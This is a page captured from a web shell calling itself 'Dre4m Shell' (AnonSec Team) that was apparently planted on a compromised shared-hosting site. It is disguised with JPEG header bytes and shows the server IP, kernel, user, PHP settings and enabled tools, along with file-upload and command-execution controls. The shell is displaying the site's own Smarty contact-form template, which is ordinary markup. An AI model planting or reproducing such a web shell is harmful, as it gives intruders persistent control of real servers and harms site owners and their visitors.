ÿØÿàJFIF``ÿþxØ Dre4m Was Here
Dre4m Shell
Server IP : 109.234.164.53  /  Your IP : 216.73.216.136
Web Server : Apache
System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64
User : computer3 ( 1098)
PHP Version : 7.1.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/computer3/atlanticswim.fr/business/business/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/computer3/atlanticswim.fr/business/business/contact_0.tpl
{include file="header.tpl"}
{include file="top.tpl"}
{if $outter_1 =='1'}  
<div class="outter"></div>
{/if}
        	 <!-- Slideshow Full -->                                      
       	   {if $slideshows_on == '1' && $slide > '0'} 
       	    {if $picture_type != '0'}
	         {include file="Slideshow_full.tpl"} 
	    	   {/if}
	    	   {/if}           	
           <!-- /Slideshow Full -->	
           
<div class="container">                                                 
    <div class="col-sm-12">   
       <div class="wow fadeInDown">                 	
          {include file="options.tpl"}
                       
<!-- Page -->
          {foreach $list as $page}
          		    	
           {nocache} 
				    		<div class="header_content">	              
				    		<h1 class="content-title">{$page.name}</h1>
				    		</div> 	    
                                              		      		          		
                <!-- content Haut -->
			    	    <div class="content">{$page.content}</div>
               
                </div>
                </div> 
                </div><!-- container --> 
          {/nocache}
          {/foreach}                 
                
                
                <section id="Milieu" >                 
                <div class="container">                                                 
                <div class="col-xs-12 col-md-10 col-md-offset-1">   
                <div class="wow fadeInDown">
                <p>&nbsp;</p>
                <p>&nbsp;</p>
                
           	    <div class="filet3" style="background:#fff; opacity:1">                 
	    		      <h2><i class="fa fa-envelope-o"></i>&nbsp;{$form_10_msg_titre}</h2>
	    		 

                <p>&nbsp;</p>	    		 
	    		          <center>
                   	<form class="form-horizontal" id="contact-form" name="contact-form" method="post" enctype="multipart/form-data" action="rappel/submit_2.php">
										<input type="hidden" name="from" value="contact">
										
  {if !empty($er_nom)}           
            <div class="alert alert-danger" style="text-align:left"><i class="fa fa-info-circle"></i> 
            {$er_nom}   
            </div>                                  
{/if}												
										
										<div class="form-group">
										<label class="col-sm-2 control-label" for="nom">{$form_2_nom} * : </label>
										<div class="col-sm-10">
										  <input class="form-control" required type="text" name="nom" id="nom" value="{$rnom}" />
										</div>
										</div>
											
  {if !empty($er_email)}           
            <div class="alert alert-danger" style="text-align:left"><i class="fa fa-info-circle"></i> 
            {$er_email}   
            </div>                                  
{/if}										
										
										<div class="form-group">
										<label class="col-sm-2 control-label" for="email">{$form_3_mail} * : </label>
										<div class="col-sm-10">
										  <input class="form-control" required type="email" name="email" id="email" value="{$remail}" />
										</div>
										</div>
										
										
										<div class="form-group">
										<label class="col-sm-2 control-label" for="telephone">{$form_4_tel} : </label>
										<div class="col-sm-10">
										  <input class="form-control" type="telephone" name="telephone" id="telephone" value="{$rtelephone}" />
										</div>
										</div>
										<br />
										<div class="form-group">
											
										 {if $rpiecejointe !==''}
										  	<label class="control-label" style="padding: 0; color : #CC3300;" for="piecejointe">{$form_9_msg_piece}</label>
										 {else}
										<label class="control-label" style="padding: 0;" for="piecejointe">{$form_9_msg_piece}</label>
										{/if}
										
										<div style="padding: 10px;">
										  <input  name="piecejointe" id="piecejointe" type="file" size="16" />
										</div>
										</div>   
	<br />										
										
  {if !empty($er_txt)}           
            <div class="alert alert-danger" style="text-align:left"><i class="fa fa-info-circle"></i> 
            {$er_txt}   
            </div>                                  
{/if}
										
										<div class="form-group">
										<label class="col-sm-2 control-label" for="texte_message">{$form_5_message} * : </label>
										<div class="col-sm-10">
										  <textarea class="form-control" required name="texte_message" id="texte_message" rows="6">{$rtexte_message}</textarea>
										</div>
										</div>  <br />
										<div class="form-group">
										<label class="control-label" style="padding: 0;color : #CC3300;" for="confirmation">{$form_7_accuse}</label>
										<div style="padding: 0;">
										  <div class="" id="confirmation">
										    <input name="confirmation" checked="checked" type="radio" id="oui" value="1" /> Oui &nbsp;&nbsp;
										    <input name="confirmation" type="radio" id="non" value="0" /> Non
										  </div>
										</div>
										</div>
										
										<br />
										
										
  {if !empty($er_captcha)}           
            <div class="alert alert-danger" style="text-align:left"><i class="fa fa-info-circle"></i> 
            {$er_captcha}   
            </div>                                           
{/if}								
										
										{$captchaTXT} : <div class="captcha"> <code>{$captcha}</code></div>
                    <input class="form-control" style="width:120px" required type="text" name="captcha" id="captcha" />
                  	<br />
										
										
										<div class="form-group">
										<input class="btn btn-primary" type="submit" name="envoi_message" id="envoi_message" value="{$form_6_bouton}" />
										</div>  	<br /> 	<br />
									</form>
	    		          </center>

                  </div>

			    	    <p>&nbsp;</p>
                </div>
                </div> 
                </div><!-- container --> 
                </section><!--/#Milieu-->	    		
	    		
	    		
	    		
	    		
       
        </div><!-- fadeInDown -->                       
    </div><!-- class="col-sm-12" -->
 </div><!-- container -->	       
{include file="bottom.tpl"}  	 		           
{include file="footer.tpl"}

Anon7 - 2022
AnonSec Team